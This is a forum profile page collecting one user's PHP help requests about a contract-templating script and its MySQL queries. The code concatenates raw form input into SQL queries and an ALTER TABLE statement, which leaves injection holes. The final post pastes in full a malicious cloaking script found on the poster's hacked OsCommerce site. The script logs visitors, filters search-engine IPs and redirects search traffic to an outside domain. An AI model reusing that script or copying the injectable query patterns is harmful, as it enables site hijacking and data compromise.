Jump to content

jbwebdesign

Member
  • Posts

    167
  • Joined

  • Last visited

Everything posted by jbwebdesign

  1. well it doesn't return an error but the num_rows doesn't return a value either because i tried to echo it out. the only thing that i can think of is the fact that the $_POST['variable'] contains special characters {#variable_name} maybe this is messing up the query. i'm really not sure what to do in this case.
  2. okay, i had a problem with one of my scripts..... it's interesting and i thought that i should post it...... i have a field in my database the contains characters such as {#blah} I want to validate my form so that if the field {#blah} already exists then show an error string. the problem is that when i create a query for mysql such as: //$_POST['variable'] = '{#blah}'; $query = "SELECT * FROM ". TABLE_VARIABLES ." WHERE variable = ".$_POST['variable']; it doesn't work and i believe it's because of the special characters being used {} so i'm wondering, how would i fix this problem? would i have to use mysql_real_escape_string function?
  3. i have another code now that is similar to the first one and it doesn't seem to work.... do you have any idea why? basically it's not letting me insert anything into the database even if it doesn't exist..... when i switch the code like you showed above then it doesn't validate anything even if it does exist..... here is the code: <?php //if the add a client form is submitted then add client information to database. if($_GET['sm'] == "new_variable" && $_GET['new'] == "yes"){ $status = "";//default value $query = "SELECT * FROM ". TABLE_VARIABLES ." WHERE variable = " . $_POST['variable']; $result = mysql_query($query); $num_rows = mysql_num_rows($result); if ($num_rows > 0) { $data['variable'] = $_POST['variable']; $data['value'] = $_POST['value']; $db->query_insert(TABLE_VARIABLES, $data); $status = "New Variable Has Been Created Successfully!<br /><br /> <a href=\"?sm=my_variables\">GO BACK</a>"; } else{ $status = $status . "Variable Already Exists!<br /><br /> <a href=\"?sm=my_variables\">GO BACK</a>"; } } ?>
  4. oh okay, i thought i was doing something wrong.... thanks
  5. hello, i have a question about this script i am making..... I am using the mysql_num_rows function and i am trying to validate a form (if the field already exists, show an error message)..... but for some reason PHP is working backwards..... am i doing something wrong? basically i have the $num_rows==0 because it seems to work this way and its supposed to be $num_rows > 0 here is my code: <?php //if the add a client form is submitted then add client information to database. if($_GET['sm'] == "new_form_field" && $_GET['new'] == "yes"){ $status = "";//default value $query = "SELECT * FROM ". TABLE_FORMS ." WHERE field_name = ".FIELD_PREFIX.$_POST['field_name']; $result = mysql_query($query); $num_rows = mysql_num_rows($result); if ($num_rows == 0) { // do something $status = $status . "Field Name Already Exists!"; //echo $query; //echo $num_rows; } else{ $data['field_name'] = FIELD_PREFIX . $_POST['field_name']; $data['form_field'] = '<input type="text" name="'.FIELD_PREFIX.$_POST['field_name'].'">'; $data['user_var'] = '{#'.FIELD_PREFIX.$_POST['field_name'].'}'; // do something else $db->query_insert(TABLE_FORMS, $data); //first we check if the field exists in that table(didn't code the checking part yet)....if not then do this $sql = "ALTER TABLE ".TABLE_USERS." ADD ".$data['field_name']." VARCHAR(100);"; $db->query($sql); $status = $status . "New Form Field Has Been Created Successfully!<br /><br /> <a href=\"?m=form_fields\">GO BACK</a>"; } } ?>
  6. The users table fields are created according to the "field_name" in the Forms table. so i was getting the value of "field_name" but it wouldn't replace the user_var with the correct value. there for i had to create a new while loop to replace the user_var with the value of the field_name loop for the $_GET['id'] user. quite confusing and difficult to explain.
  7. yes, and i just found my mistake here is my new code : <?php include("process.php"); ?> <h2>Generated Contract</h2> <div id="success"><?php echo $status; ?></div> <?php $contract_id = $_POST['contractID']; $client_id = $_POST['clientID']; $sql = "SELECT * FROM " . TABLE_CONTRACTS . " WHERE id=" . $contract_id; // feed it the sql directly. store all returned rows in an array $rows = $db->fetch_all_array($sql); // get customized variables to tie into the contract $sql2 = "SELECT variable,value FROM " . TABLE_VARIABLES; $rows2 = $db->query($sql2); //lets get out customized form fields $sql4 = "SELECT * FROM " . TABLE_FORMS; $rows4 = $db->fetch_all_array($sql4); //lets get out customized form fields //$sql3 = "SELECT * FROM " . TABLE_FORMS; $sql3 = "SELECT ".TABLE_FORMS.".field_name,".TABLE_FORMS.".user_var"; foreach($rows4 as $record4){ $sql3 .= ", ".TABLE_USERS.".".$record4['field_name'].""; } $sql3 .=" ". "FROM ".TABLE_FORMS.", ".TABLE_USERS." ". "WHERE ".TABLE_USERS.".id=".$_POST['clientID']; $rows3 = $db->query($sql3); //lets get the fields from the users table FROM THE SELECTED USER $sql5 = "SELECT "; foreach($rows4 as $record4){ $sql5 .= $record4['field_name'] . ','; } //remove the last comma from the looped values $sql5_final = substr($sql5, 0, -1); $sql5_final .= " FROM " . TABLE_USERS . " WHERE id=". $_POST['clientID']; // print out array later on when we need the info on the page foreach($rows as $record){ ?> <div id="Contract"> <form action="modules/my_contracts/filled_contract.php" method="post"> <input type="hidden" name="id" value="<?php echo $_GET['id']; ?>" /> <label for="contract_type">Contract Type:</label><input type="text" id="contract_type" name="contract_type" value="<?php echo $record['contract_type']; ?>"> <label for="contract_name">Contract Name:</label><input type="text" id="contract_name" name="contract_name" value="<?php echo $record['contract_name']; ?>"> <br /><br /> <label for="contract_content">Contract Content:</label> </div> <div id="ContractContent"> <textarea class="ckeditor" cols="80" id="contractContent" name="contract_content" rows="10"> <?php //echo $sql3; while($key = $db->fetch_array($rows2)){ if(stristr($record['contract_content'],$key['variable'])){ $record['contract_content'] = str_replace($key['variable'],$key['value'],$record['contract_content']); } } while($key2 = $db->fetch_array($rows3)){ if(stristr($record['contract_content'],$key2['user_var'])){ $record['contract_content'] = str_replace($key2['user_var'],$key2['field_name'],$record['contract_content']); //now we have to replace the key2[field_name] with the actual value of it $q = mysql_query($sql5_final); while($my_rows = mysql_fetch_array($q, MYSQL_ASSOC)){ $record['contract_content'] = str_replace($key2['field_name'],$my_rows[$key2['field_name']],$record['contract_content']); } } } echo $record['contract_content']; ?> </textarea> <input type="submit" value="Print Contract!"> </form> </div> <?php }//end for loop ?>
  8. hello, I am working on a script and i can't seem to get it to work properly. the loops are confusing me..... I am trying to loop through the "forms" table. the fields in the table are "field_name" and "user_var". The problem comes in where i try to replace the $record['contract_content'] that contains any "user_var" with the value of the field from the users table where id=42 i have 2 tables 1.)users a.)id b.)client_first_name c.)client_last_name d.)client_address e.)client_city f.)client_state g.)client_zipcode h.)client_cell_phone 2.)forms a.)id b.)field_name c.)user_var here is my query: SELECT forms.field_name,forms.user_var, users.client_first_name, users.client_last_name, users.client_address, users.client_city, users.client_state, users.client_zipcode, users.client_cell_phone FROM forms, users WHERE users.id=42 here is my code: <?php include("process.php"); ?> <h2>Generated Contract</h2> <div id="success"><?php echo $status; ?></div> <?php $contract_id = $_POST['contractID']; $client_id = $_POST['clientID']; $sql = "SELECT * FROM " . TABLE_CONTRACTS . " WHERE id=" . $contract_id; // feed it the sql directly. store all returned rows in an array $rows = $db->fetch_all_array($sql); // get customized variables to tie into the contract $sql2 = "SELECT variable,value FROM " . TABLE_VARIABLES; $rows2 = $db->query($sql2); //lets get out customized form fields $sql4 = "SELECT * FROM " . TABLE_FORMS; $rows4 = $db->fetch_all_array($sql4); //lets get out customized form fields $sql3 = "SELECT * FROM " . TABLE_FORMS; $sql3 = "SELECT ".TABLE_FORMS.".field_name,".TABLE_FORMS.".user_var"; foreach($rows4 as $record4){ $sql3 .= ", ".TABLE_USERS.".".$record4['field_name'].""; } $sql3 .=" ". "FROM ".TABLE_FORMS.", ".TABLE_USERS." ". "WHERE ".TABLE_USERS.".id=".$_POST['clientID']; $rows3 = $db->query($sql3); //lets get the fields from the users table FROM THE SELECTED USER $sql5 = "SELECT * FROM " . TABLE_USERS . " WHERE id=". $_POST['clientID']; $rows5 = $db->query($sql5); // print out array later on when we need the info on the page foreach($rows as $record){ ?> <div id="Contract"> <form action="modules/my_contracts/filled_contract.php" method="post"> <input type="hidden" name="id" value="<?php echo $_GET['id']; ?>" /> <label for="contract_type">Contract Type:</label><input type="text" id="contract_type" name="contract_type" value="<?php echo $record['contract_type']; ?>"> <label for="contract_name">Contract Name:</label><input type="text" id="contract_name" name="contract_name" value="<?php echo $record['contract_name']; ?>"> <br /><br /> <label for="contract_content">Contract Content:</label> </div> <div id="ContractContent"> <textarea class="ckeditor" cols="80" id="contractContent" name="contract_content" rows="10"> <?php //echo $sql3; while($key = $db->fetch_array($rows2)){ if(stristr($record['contract_content'],$key['variable'])){ $record['contract_content'] = str_replace($key['variable'],$key['value'],$record['contract_content']); } } /* * * The problem is somewhere around here..... * */ while($key2 = $db->fetch_array($rows3)){ if(stristr($record['contract_content'],$key2['user_var'])){ foreach($rows4 as $record4){ $record['contract_content'] = str_replace($key2['user_var'],$key2[$record4['field_name']],$record['contract_content']); } } } echo $record['contract_content']; ?> </textarea> <input type="submit" value="Print Contract!"> </form> </div> <?php }//end for loop ?> any ideas on how to do this?
  9. it works! thanks, and yes i am going to do the database work now that i have this correct
  10. it's looping the string 3 times 1st time it gets the value of the first variable {#Apple} and replaces it with "Red" 2nd time it gets the value of the second variable {#Banana} and replaces it with "Yellow", however the 1st variable is {#Apple} instead of "Red". 3rd time it gets the value of the third variable {#Orange} and replaces it with "Orange" , but the 1st and 2nd variables are back to {#Apple} and {#Banana} ---------------------------------- I do not want to loop the string. I want to loop through the table with all the different variables and if the string contains any of the variables in the table then i want to replace them with the value. but i only want to have 1 string not 3
  11. yes they hold the records, let me try to explain a bit differently........ i have a table structure as follows: (id, variable, value) 1, {#Apple}, Red 2, {#Banana}, Yellow 3, {#Orange}, Orange now i have a string: $string = "blah blah blah blah blah blah blah {#Apple} blah blah blah blah blah blah {#Banana} blah blah blah blah blah {#Orange}"; As you can see above, i have a table with 3 different rows. I want to replace the variables in my string with the actual value from the table. so my new string would be: $new_string = "blah blah blah blah blah blah blah Red blah blah blah blah blah blah Yellow blah blah blah blah blah Orange";
  12. i'm sorry, maybe this is a better explanation...... i have a database with 2 different tables. table 1 is called variables table 2 is called contracts the variables table has 3 columns, id variable value this is kind of difficult for me to explain but here is an example: lets say the variable table has a variable called "{#Apple}" and the value of that variable is "Red" then i would like for PHP to Search the string $record['contract_content'] for the variable "{#Apple}" and to replace that variable with the value of it which is "Red". however, there is multiple variables, there for i want it to loop through all of the variables and replace all of them with the value.
  13. Hello everyone, I'm working on a script and i'm having a problem getting it to do what i want. Basically i am looking to pull content from a MySQL database, search the string of content for a specific word(text) and replace it with another word(text) from a different table in the same database. I have created a loop to loop through the table with words that are going to replace the words of this string. The only problem is that it loops the content 3 times. the first time, it loops through the content and replaces the 1st word in the table, the 2nd time it loops through the content and replaces the 2nd word in the table but the first word isn't replaced anymore etc. can someone please help? here is my code: <h2>Generated Contract</h2> <div id="success"><?php echo $status; ?></div> <?php $contract_id = $_POST['contractID']; $client_id = $_POST['clientID']; $sql = "SELECT * FROM " . TABLE_CONTRACTS . " WHERE id=" . $contract_id; // feed it the sql directly. store all returned rows in an array $rows = $db->fetch_all_array($sql); // get customized variables to tie into the contract $sql2 = "SELECT variable,value FROM " . TABLE_VARIABLES; $rows2 = $db->query($sql2); // print out array later on when we need the info on the page foreach($rows as $record){ ?> <div id="Contract"> <form action="?sm=edit_contract&update=yes" method="post"> <input type="hidden" name="id" value="<?php echo $_GET['id']; ?>" /> <label for="contract_type">Contract Type:</label><input type="text" id="contract_type" name="contract_type" value="<?php echo $record['contract_type']; ?>"> <label for="contract_name">Contract Name:</label><input type="text" id="contract_name" name="contract_name" value="<?php echo $record['contract_name']; ?>"> <br /><br /> <label for="contract_content">Contract Content:</label> </div> <div id="ContractContent"> <textarea class="ckeditor" cols="80" id="contractContent" name="contract_content" rows="10"> <?php while($key = $db->fetch_array($rows2)){ if(stristr($record['contract_content'],$key['variable'])){ echo str_replace($key['variable'],$key['value'],$record['contract_content']); } } echo $record['contract_content']; ?> </textarea> <input type="submit" value="Print Contract!"> </form> </div> <?php }//end for loop ?>
  14. Okay so this morning my hosting company notified me that my OsCommerce website was hacked so i looked through the files and the .htaccess file was hacked.... they wrote some sort of ReWriteEngine code and it was pointing to a different directory in my website with a variable and the number 1 and another line with a variabl and number 2 (directory_name/$2.php).....when i looked inside that directory i saw an "err.txt" file followed by a bunch of PHP files that i never seen in my life........ hmmmm I opened a few of them to read the coding and i saw some interesting lines of code.....here is an example of 1 of the files: This file's name was "pack1.php" <? $logname = "err.txt"; error_reporting(0); ini_set("display_errors", FALSE); if (!defined("PHP_EOL")) define("PHP_EOL", " "); $ua = (isset($_SERVER["HTTP_USER_AGENT"])) ? $_SERVER["HTTP_USER_AGENT"] : (isset($HTTP_SERVER_VARS["HTTP_USER_AGENT"]) ? $HTTP_SERVER_VARS["HTTP_USER_AGENT"] : ""); $ua = trim(htmlspecialchars($ua)); $referrer = htmlspecialchars(isset($_SERVER["HTTP_REFERER"]) ? trim($_SERVER["HTTP_REFERER"]) : ""); $botip = (isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : ""); $botip = trim($botip); $req = (isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : ""); $req .= (isset($_SERVER["QUERY_STRING"]) AND !empty($_SERVER["QUERY_STRING"])) ? "?" . $_SERVER["QUERY_STRING"] : ""; $req = trim(htmlspecialchars($req)); /* if (substr($_SERVER["DOCUMENT_ROOT"], -1) == "/") { $file = $_SERVER["DOCUMENT_ROOT"] . $logname; } else { $file = $_SERVER["DOCUMENT_ROOT"] . "/" . $logname; } */ /** * r.B Super Pack v.1.4 (www.lalf.ru) **/ $displaynone = FALSE; if(1==1) { $data = ""; if((@file_exists($logname) === FALSE) OR (@filesize($logname) == 0)) { $data .= "???? ?????^???? ?????^IP-?????^????????^?????????? ????????" . PHP_EOL; } $data .= @date("j.m.Y H:i") . "^" . $ua . "^" . $botip . "^" . $referrer . "^" . $req . PHP_EOL; @chmod($logname, 0777); $f = @fopen($logname, "a"); @fwrite($f, $data); @fclose($f); // $displaynone = FALSE; } else { $displaynone = TRUE; } error_reporting( E_ERROR ); $ips = array("64.68.80.", "64.68.81.", "64.68.82.", "64.68.83.", "64.68.84.", "64.68.85.", "64.68.86.", "64.68.87.", "64.68.88.", "64.68.89.", "64.68.90.", "64.68.91.", "64.68.92.", "64.233.160.", "64.233.161.", "64.233.162.", "64.233.163.", "64.233.164.", "64.233.165.", "64.233.166.", "64.233.167.", "64.233.168.", "64.233.169.", "64.233.170.", "64.233.171.", "64.233.172.", "64.233.173.", "64.233.174.", "64.233.175.", "64.233.176.", "64.233.177.", "64.233.178.", "64.233.179.", "64.233.180.", "64.233.181.", "64.233.182.", "64.233.183.", "64.233.184.", "64.233.185.", "64.233.186.", "64.233.187.", "64.233.188.", "64.233.189.", "64.233.190.", "64.233.191.", "66.102.0.", "66.102.1.", "66.102.2.", "66.102.3.", "66.102.4.", "66.102.5.", "66.102.6.", "66.102.7.", "66.102.8.", "66.102.9.", "66.102.10.", "66.102.11.", "66.102.12.", "66.102.13.", "66.102.14.", "66.102.15.", "66.249.64.", "66.249.65.", "66.249.66.", "66.249.67.", "66.249.68.", "66.249.69.", "66.249.70.", "66.249.71.", "66.249.72.", "66.249.73.", "66.249.74.", "66.249.75.", "66.249.76.", "66.249.77.", "66.249.78.", "66.249.79.", "66.249.80.", "66.249.81.", "66.249.82.", "66.249.83.", "66.249.84.", "66.249.85.", "66.249.86.", "66.249.87.", "66.249.88.", "66.249.89.", "66.249.90.", "66.249.91.", "66.249.92.", "66.249.93.", "66.249.94.", "66.249.95.", "72.14.192.", "72.14.193.", "72.14.194.", "72.14.195.", "72.14.196.", "72.14.197.", "72.14.198.", "72.14.199.", "72.14.200.", "72.14.201.", "72.14.202.", "72.14.203.", "72.14.204.", "72.14.205.", "72.14.206.", "72.14.207.", "72.14.208.", "72.14.209.", "72.14.210.", "72.14.211.", "72.14.212.", "72.14.213.", "72.14.214.", "72.14.215.", "72.14.216.", "72.14.217.", "72.14.218.", "72.14.219.", "72.14.220.", "72.14.221.", "72.14.222.", "72.14.223.", "72.14.224.", "72.14.225.", "72.14.226.", "72.14.227.", "72.14.228.", "72.14.229.", "72.14.230.", "72.14.231.", "72.14.232.", "72.14.233.", "72.14.234.", "72.14.235.", "72.14.236.", "72.14.237.", "72.14.238.", "72.14.239.", "72.14.240.", "72.14.241.", "72.14.242.", "72.14.243.", "72.14.244.", "72.14.245.", "72.14.246.", "72.14.247.", "72.14.248.", "72.14.249.", "72.14.250.", "72.14.251.", "72.14.252.", "72.14.253.", "72.14.254.", "72.14.255.", "74.125.", "209.85.128.", "209.85.129.", "209.85.130.", "209.85.131.", "209.85.132.", "209.85.133.", "209.85.134.", "209.85.135.", "209.85.136.", "209.85.137.", "209.85.138.", "209.85.139.", "209.85.140.", "209.85.141.", "209.85.142.", "209.85.143.", "209.85.144.", "209.85.145.", "209.85.146.", "209.85.147.", "209.85.148.", "209.85.149.", "209.85.150.", "209.85.151.", "209.85.152.", "209.85.153.", "209.85.154.", "209.85.155.", "209.85.156.", "209.85.157.", "209.85.158.", "209.85.159.", "209.85.160.", "209.85.161.", "209.85.162.", "209.85.163.", "209.85.164.", "209.85.165.", "209.85.166.", "209.85.167.", "209.85.168.", "209.85.169.", "209.85.170.", "209.85.171.", "209.85.172.", "209.85.173.", "209.85.174.", "209.85.175.", "209.85.176.", "209.85.177.", "209.85.178.", "209.85.179.", "209.85.180.", "209.85.181.", "209.85.182.", "209.85.183.", "209.85.184.", "209.85.185.", "209.85.186.", "209.85.187.", "209.85.188.", "209.85.189.", "209.85.190.", "209.85.191.", "209.85.192.", "209.85.193.", "209.85.194.", "209.85.195.", "209.85.196.", "209.85.197.", "209.85.198.", "209.85.199.", "209.85.200.", "209.85.201.", "209.85.202.", "209.85.203.", "209.85.204.", "209.85.205.", "209.85.206.", "209.85.207.", "209.85.208.", "209.85.209.", "209.85.210.", "209.85.211.", "209.85.212.", "209.85.213.", "209.85.214.", "209.85.215.", "209.85.216.", "209.85.217.", "209.85.218.", "209.85.219.", "209.85.220.", "209.85.221.", "209.85.222.", "209.85.223.", "209.85.224.", "209.85.225.", "209.85.226.", "209.85.227.", "209.85.228.", "209.85.229.", "209.85.230.", "209.85.231.", "209.85.232.", "209.85.233.", "209.85.234.", "209.85.235.", "209.85.236.", "209.85.237.", "209.85.238.", "209.85.239.", "209.85.240.", "209.85.241.", "209.85.242.", "209.85.243.", "209.85.244.", "209.85.245.", "209.85.246.", "209.85.247.", "209.85.248.", "209.85.249.", "209.85.250.", "209.85.251.", "209.85.252.", "209.85.253.", "209.85.254.", "209.85.255.", "216.239.32.", "216.239.33.", "216.239.34.", "216.239.35.", "216.239.36.", "216.239.37.", "216.239.38.", "216.239.39.", "216.239.40.", "216.239.41.", "216.239.42.", "216.239.43.", "216.239.44.", "216.239.45.", "216.239.46.", "216.239.47.", "216.239.48.", "216.239.49.", "216.239.50.", "216.239.51.", "216.239.52.", "216.239.53.", "216.239.54.", "216.239.55.", "216.239.56.", "216.239.57.", "216.239.58.", "216.239.59.", "216.239.60.", "216.239.61.", "216.239.62.", "216.239.63.", "112.78.198.", "207.58.134.", "117.121.245.", "87.98.215.", "210.48.108.", "129.174.95.", "97.74.202.", "207.158.15.", "213.186.49.", "207.107.180.", "78.46.70.", "72.51.34.", "75.119.196.", "142.46.205.", "199.103.60.", "208.69.58.", "76.74.252.", "64.38.48.", "204.14.93.", "208.88.7.", "87.117.195.", "210.48.67.", "74.80.111.", "118.169.40.", "67.205.4.", "208.97.133.", "64.34.165.", "137.110.222.", "76.74.159.", "67.205.5.", "128.118.52.", "75.101.228.", "67.205.31.", "75.119.214.", "208.87.24.", "76.74.253.", "81.107.80.", "192.17.19.", "69.163.133.", "97.74.127.", "188.40.114.", "78.46.71.", "64.38.49.", "86.109.112.", "67.205.30.", "93.181.13.", "207.189.121.", "113.112.224.", "216.66.45.", "180.89.137.", "65.91.117.", "69.163.132.", "67.195.114.", "124.124.161.", "211.162.99.", "66.219.58.", "218.213.131.", "77.88.26.", "69.84.207.", "71.41.201.", "198.145.116.", "119.255.15.", "204.236.185.", "193.47.80.", "124.125.43.", "120.141.94.", "84.58.239.", "95.97.120.", "69.124.188.", "74.82.68.", "68.171.235.", "83.16.115.", "69.94.201.", "75.119.213.", "118.169.43.", "220.181.108.", "125.166.255.", "184.72.7.", "208.80.194.", "111.234.213.", "76.18.92.", "68.171.231.", "80.239.242.", "184.72.5.", "68.171.233.", "62.150.159.", "67.202.54.", "24.200.166.", "82.94.179.", "189.41.25.", "72.30.142.", "207.34.113.", "124.124.181.", "88.213.226.", "120.138.82.", "118.169.35.", "220.130.53.", "173.217.225.", "213.114.147.", "113.172.83.", "120.141.96.", "117.81.1.", "204.236.235.", "196.201.151.", "218.171.65.", "65.91.116.", "118.160.192.", "116.4.170.", "70.139.149.", "70.171.83.", "87.222.31.", "77.52.26.", "218.108.32.", "119.150.170.", "180.183.160.", "188.72.241.", "183.22.70.", "210.19.199.", "192.8.109.", "64.34.177.", "65.208.151.", "212.2.96.", "83.253.165.", "91.212.12.", "38.125.95.", "81.219.142.", "41.71.141.", "178.101.18.", "93.46.195.", "184.72.20.", "189.181.240.", "77.52.119.", "65.89.98.", "66.46.182.", "173.30.50.", "24.9.231.", "92.241.182.", "71.196.59.", "98.200.31.", "98.253.12.", "76.20.47.", "116.21.190.", "120.42.64.", "123.243.52.", "155.98.58.", "210.112.38.", "78.86.168.", "94.23.29.", "85.178.77.", "70.242.119.", "118.169.34.", "63.225.116.", "94.100.189.", "188.165.206.", "203.122.194.", "206.53.152.", "83.237.203.", "113.118.45.", "217.139.237.", "91.121.211.", "188.99.235.", "41.153.158.", "94.100.181.", "61.135.190.", "166.216.226.", "74.82.64.", "212.23.97.", "96.254.21.", "79.116.100.", "67.221.36.", "193.253.195.", "88.9.214.", "213.37.56.", "67.202.61.", "72.44.51.", "86.3.144.", "116.4.80.", "203.168.166.", "208.107.181.", "121.227.40.", "221.225.71.", "90.193.16.", "82.128.2.", "206.53.147.", "98.237.50.", "88.14.198.", "115.173.48.", "89.170.103.", "216.38.216.", "195.229.242.", "122.88.201.", "94.203.252.", "216.171.98.", "220.246.73.", "203.82.66.", "200.253.150.", "206.53.153.", "41.153.150.", "115.173.36.", "67.228.95.", "110.175.149.", "77.103.220.", "115.173.50.", "183.11.43.", "212.225.159.", "88.208.209.", "93.186.31.", "208.54.14.", "86.101.113.", "61.141.205.", "221.6.75.", "114.86.201.", "89.96.63."); $thisip = $_SERVER["REMOTE_ADDR"]; $isbot = false; $zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", ".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW"); for ($i=0; $i<count($ips); $i++) { $curip = trim($ips[$i]); if (strstr($thisip, $curip)) { $isbot = true; } } if (!$isbot) { $htr = $_SERVER["HTTP_REFERER"]; $flag_g = stristr($htr, "google"); $flag_y = stristr($htr, "yahoo"); if (!$flag_g && !$flag_y) { $isbot = true; } } if (!$isbot) { $tmp1 = explode("q=", $htr); $tmp2 = explode("&",$tmp1[1]); $kw = $tmp2[0]; $flag1 = false; for ($i=0; $i<count($zones); $i++) { $zone = trim($zones[$i]); if (stristr($kw, $zone)) { $isbot = true; break; } } } if (!$isbot) { header("Location: http://searchhouse.in/up/search.php"); } ?> <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html dir="LTR" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>[secrets of faydwer all in one pack] [maxell 50 pack 16x dvd r] </title> <base href="http://www.bootyflyjeans.com/wholesale/"> <script type="text/javascript" src="iepngfix_tilebg.js"></script> <link rel="stylesheet" type="text/css" href="http://www.bootyflyjeans.com/stylesheet.css"> <style type="text/css"> .ie6_png {behavior: url("iepngfix.htc") } .ie6_png img {behavior: url("iepngfix.htc") } .ie6_png input {behavior: url("iepngfix.htc") } </style> <!--[if IE]> <script type="text/javascript" src="ie_png.js"></script> <script type="text/javascript"> ie_png.fix('.png'); </script> <![endif]--> </head> <body> <!-- header //--> <!-- start --> <!-- start --> <div class="bg_body2"><p> 700mb 80 minute 52x cd r media 100 pack spindle </p> <p> r media 100 pack spindle </p> <p> extreme ii 100oz hydration pack </p> <p> to pack a rucsac </p> <table cellpadding="0" cellspacing="0" border="0" align="center" class="width_table"> <tr><p> ruffwear palisades pack ii </p> <p> cbt nuggests exam pack 70 </p> <p> go media vector pack discount </p> <p> modkore hybrid field pack </p> <td class="row_1 width_td"><p> hq8 40 sensotec triple pack rotary cutting </p> <li><a href='http://www.bootyflyjeans.com/perfect185'>perfect185</a></li> <p> a four pack in a </p> <li><a href='http://www.bootyflyjeans.com/phone219'>phone219</a></li> <table cellpadding="0" cellspacing="0" border="0"> <tr><p> death by a pack of wildebeests and </p> <p> swaddlers size 1 2 economy pack </p> <p> fluxx blanxx bstr pack </p> <p> many cigarrets in a pack </p> <td><p> dual pack for the samsung hue </p> <p> 100 whey gold standard variety pack </p> <p> graco sihouette pack n </p> <p> where can i buy eagle pack </p> <table cellpadding="0" cellspacing="0" border="0"> <tr><p> 3 pack rubberized grip steering </p> <p> gamester race pack for use </p> <p> the rat pack at the savoy </p> <p> pack olv nl 1yr acq </p> <td class="logo"><p> interloper pack x pac </p> <p> 9 a fa f0 9 pack c hex $1 </p> <p> homemade face pack for dry </p> <p> actiontec megaplug 85mb powerline homeplug ethernet adapter 2 pack </p> <a href="http://www.bootyflyjeans.com/wholesale/index.php?osCsid=s0e0btg47fh0dvsfhmhf2vsqe4"><img src="images/logo.jpg" border="0" alt="" width="377" height="98"></a></td> <td style="width:100%;padding:75px 18px 0px 0px;"><p> camelbak classic 100oz hydration pack </p> <p> jansport air cisco sling pack </p> <p> yamaha f310 acoustic pack </p> <p> rei ul 30 pack </p> <table cellpadding="0" cellspacing="0" border="0" class="header"> <tr><p> pick it up pack it in </p> <p> audioware mix pack au vst rtas v2 </p> <p> keystone four pack pass </p> <p> cd rom pack pk cspj </p> <td style="width:100%;"><p> beck of the pack </p> <p> of a pack of marlboros </p> <p> the ledgendary map pack </p> <li><a href='http://www.bootyflyjeans.com/patch147'>patch147</a></li> <img src="images/spacer.gif" border="0" alt="" width="1" height="1"></td> <td style="padding:9px 0px 0px 0px;"><li><a href='http://www.bootyflyjeans.com/page9'>page9</a></li> <p> dvd r dual layer 10 pack spindle </p> <li><a href='http://www.bootyflyjeans.com/pictures256'>pictures256</a></li> <p> duracell supreme aaa rechargeable 4 pack </p> <table border="0" cellspacing="0" cellpadding="0" align="center" style="width:206px;"> <tr><li><a href='http://www.bootyflyjeans.com/pictures265'>pictures265</a></li> <p> age of empires the conquerors expansion pack </p> <p> nikko g pack for </p> <p> retexture pack for zelda oot and mq </p> <td><p> bo bombd grenade pack </p> <p> vista transformation pack 8.0 for xp </p> <p> of gas a half a pack of cigarattes </p> <p> cisco ccvp exam pack 642 444 cipt dvdr ag </p> Currencies: </td><td style="width:100%;"><p> axis 207mw 10 pack </p> <p> inov 8 race pro 4 waist pack </p> <p> pack of wildebeests and </p> <p> how to get a six pack abs for </p> <form name="currencies" action="http://www.bootyflyjeans.com/wholesale/index.php" method="get"><select name="currency" onChange="this.form.submit();" class="select"><option value="USD" SELECTED>US Dollar</option><option value="EUR">Euro</option></select><input type="hidden" name="osCsid" value="s0e0btg47fh0dvsfhmhf2vsqe4"></form></td> </tr> </table> </td> <td><p> fppa mixer attachment pack for </p> <p> philips philishave hq9 40 speed xl triple pack rotary cutting </p> <p> how do you get an 8 pack </p> <p> x terra 70 